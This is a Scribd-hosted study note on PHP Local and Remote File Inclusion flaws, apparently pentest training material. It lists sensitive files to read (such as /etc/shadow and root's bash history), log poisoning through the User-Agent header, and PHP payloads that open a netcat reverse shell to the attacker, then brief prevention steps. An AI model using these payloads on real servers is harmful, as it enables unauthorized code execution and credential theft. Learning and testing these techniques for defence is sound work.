Scribd
Upload
13 views2 pages

File Inclusion

File Inclusion vulnerabilities allow attackers to include files in an application due to improper sanitization, with two main types being Local File Inclusion (LFI) and Remote File Inclusion (RFI). Exploitation methods involve including malicious scripts to gain unauthorized access or execute commands remotely. Prevention techniques include proper parameter sanitization and disabling certain PHP configurations to mitigate risks.

Uploaded by

John Wick
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
13 views2 pages

File Inclusion

File Inclusion vulnerabilities allow attackers to include files in an application due to improper sanitization, with two main types being Local File Inclusion (LFI) and Remote File Inclusion (RFI). Exploitation methods involve including malicious scripts to gain unauthorized access or execute commands remotely. Prevention techniques include proper parameter sanitization and disabling certain PHP configurations to mitigate risks.

Uploaded by

John Wick
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
You are on page 1/ 2

File Inclusion Vuln:

=================
File Inclusion vulnerability allows an attacker to include a file, usually
exploiting a “dynamic file inclusion” mechanism implemented in the target
application when proper sanitization is not done.

When we test for Local File Inclusion or Remote File Inclusion vulnerabilities, we
should be looking for scripts that take filenames as parameters, such as ‘file,
page, URL, path, filename’ etc.

Types of File inclusion vuln:


1. Local File Inclusion
2. Remote file inclusion

LFI: This happens when there is no proper sanitization for the parameter including
the file.
So we can browse the remote files of the target. Some important files that can be
accessed are:
– /etc/issue
– /proc/version
– /proc/self/environ
– /etc/profile
– /etc/passwd
– /etc/passwd
– /etc/shadow
– /root/.bash_history
– /var/log/dmessage
– /var/mail/root
– /var/spool/cron/crontabs/root

Exploitation:
-----------------
--> We can try to include our own malicious php script in any log files and try to
get remote reverse connection.
Ex: /proc/self/environ
--> And in we try to capture this request in the burp suite.
--> One of the headers included in the request and the environ file is User-Agent
--> Example script to execute <?phpinfo();?>

To get reverse connection:


In kali open a port : nc -l -v <port> -v
passthru function is used to execute remote php commands.
In the request give the parameter value as : <?passthru("nc -e /bin/sh IP PORT");?>

RFI: This happens when the target server uses functions such as i. allow_url_fopen
ii. allow_url_include

Exploitation:
------------------
--> To check for these configurations we have to find the php configuration file.
It is mentioned for us in the php info page.
--> Open the file and check settings
--> Restart the apache server if any changes made: /etc/init.d/apache2 restart
--> Now create a malicious php code file:

<? php
passthru("nc -e /bin/sh IP PORT");
?>
--> Save it as a text file and save it on the kali web server. Do not save as PHP
or it will automatically execute on the kali machine itself.
--> Now go to the target webiste and give the link of the text file with a question
mark in the end. Before that start listening on kali machine.

If these are enabled hackers can include any file of their choice and execute them
remotely.

Prevention techniques:
1. Sanitize the parameter properly to see to it that only the local pages which are
required are included.
2. Disable allow_url_include and allow_url_fopen.

Resources:
https://www.offensive-security.com/metasploit-unleashed/file-inclusion-
vulnerabilities/
https://www.php.net/manual/en/function.passthru.php
https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

You might also like